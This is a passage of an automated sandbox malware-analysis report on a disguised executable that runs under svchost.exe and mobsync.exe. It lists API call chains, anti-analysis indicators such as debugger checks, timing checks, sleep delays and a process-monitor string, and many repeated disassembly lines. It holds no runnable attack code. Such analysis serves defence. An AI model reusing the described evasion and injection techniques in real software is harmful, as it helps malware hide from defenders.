                Source: Binary string: mobsync.pdb source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
                Source: YH-3-12-2024-GDL Units - Projects.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: YH-3-12-2024-GDL Units - Projects.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: YH-3-12-2024-GDL Units - Projects.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: YH-3-12-2024-GDL Units - Projects.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: YH-3-12-2024-GDL Units - Projects.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C4B37 LoadLibraryA,GetProcAddress,0_2_007C4B37
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082848F push FFFFFF8Bh; iretd 0_2_00828491
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007EE70F push edi; ret 0_2_007EE711
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007EE828 push esi; ret 0_2_007EE82A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007E8945 push ecx; ret 0_2_007E8958
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007EEA03 push esi; ret 0_2_007EEA05
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007EEAEC push edi; ret 0_2_007EEAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004143C1 push cs; ret 1_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403070 push eax; ret 1_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004120AF push ebp; retf 1_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418172 push esi; retf 1_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040AADE push ebp; iretd 1_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414344 push cs; ret 1_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417C7C push esi; iretd 1_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00413D3D push esp; ret 1_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040CE68 push ecx; retf 1_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx 1_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0283D push eax; iretd 1_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01368 push eax; iretd 1_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C01065 push edi; ret 1_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033D3A60 push FFFFFF98h; iretd 2_2_033D3A63
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033CAA4F push ecx; retf 2_2_033CAA52
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033D306E push ecx; retf 2_2_033D30A6
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033D5863 push esi; iretd 2_2_033D5866
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033C86C5 push ebp; iretd 2_2_033C86C7
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033D5D59 push esi; retf 2_2_033D5D64
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe | Code function: 2_2_033CFC96 push ebp; retf 2_2_033CFC97
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 3_2_04DE27FA pushad ; ret 3_2_04DE27F9
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 3_2_04DE225F pushad ; ret 3_2_04DE27F9
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007C48D7
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00845376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00845376
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007E3187
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | API/Special instruction interceptor: Address: F751CC
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\mobsync.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668432399.000000000108A000.00000004.00000020.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668419174.000000000107A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-101865
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\mobsync.exe | API coverage: 2.4 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 1196 | Thread sleep count: 46 > 30
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 1196 | Thread sleep time: -92000s >= -30000s
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe TID: 2124 | Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe TID: 2124 | Thread sleep time: -37500s >= -30000s
                Source: C:\Windows\SysWOW64\mobsync.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0082445A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082C6D1 FindFirstFileW,FindClose,0_2_0082C6D1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0082C75C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0082EF95
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0082F0F2
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0082F3F3
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_008237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008237EF
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00823B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00823B12
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0082BCBC
                Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 3_2_02E9C560 FindFirstFileW,FindNextFileW,FindClose,3_2_02E9C560
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007C49A0
                Source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                Source: zZyhwwvEVl.exe, 00000007.00000002.3503138544.0000000001560000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2165589495.00000138B840C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\mobsync.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417543 LdrLoadDll,1_2_00417543
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00833F09 BlockInput,0_2_00833F09
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007C3B3A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007F5A7C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_007C4B37 LoadLibraryA,GetProcAddress,0_2_007C4B37
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00F75498 mov eax, dword ptr fs:[00000030h] 0_2_00F75498
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00F75438 mov eax, dword ptr fs:[00000030h] 0_2_00F75438
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00F73E08 mov eax, dword ptr fs:[00000030h] 0_2_00F73E08
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h] 1_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] 1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h] 1_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] 1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h] 1_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h] 1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] 1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h] 1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h] 1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h] 1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h] 1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h] 1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h] 1_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h] 1_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h] 1_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h] 1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h] 1_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h] 1_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h] 1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h] 1_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h] 1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] 1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h] 1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] 1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] 1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
